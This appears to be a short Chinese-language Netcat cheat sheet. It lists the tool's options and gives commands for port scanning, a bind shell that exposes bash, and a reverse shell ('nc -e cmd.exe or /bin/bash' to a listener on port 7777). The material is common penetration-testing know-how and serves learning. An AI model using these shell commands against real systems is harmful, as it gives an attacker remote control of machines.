一般Netcat有两个版本,一个版本是不提供反向连接的版本,一个是全功能版本。这两者的区别就是是否带-e参数,只有带-e参数的版本才支持反向连接。
参数说明
- -c shell commands shell模式
- -e filename 程序重定向
- -b 允许广播
- -d 无命令行界面,使用后台模式
- -g gateway 源路由跳跃点, 不超过8
- -G num 源路由指示器: 4, 8, 12, ...
- -h 获取帮助信息
- -i secs 延时设置,端口扫描时使用
- -k 设置在socket上的存活选项
- -l 监听入站信息
- -n 以数字形式表示的IP地址
- -o file 使进制记录
- -p port 本地端口
- -r 随机本地和远程的端口
- -q secs 在标准输入且延迟后退出(翻译的不是很好,后面实例介绍)
- -s addr 本地源地址
- -T tos 设置服务类型
- -t 以TELNET的形式应答入站请求
- -u UDP模式
- -v 显示详细信息 [使用=vv获取更详细的信息
- -w secs 连接超时设置
- -z I/O 模式 [扫描时使用]
端口扫描
nc -nv ip port
nc -nvz -w 5 ip 1-65535
正向连接
将自己的Bash发送出去:
nc -lp port -c bash
监听:
nc ip port
反向连接
方式一、
监听:
nc -lvp 7777
反弹cmd:
nc -e cmd.exe(或者/bin/bash) 10.20.40.* 7777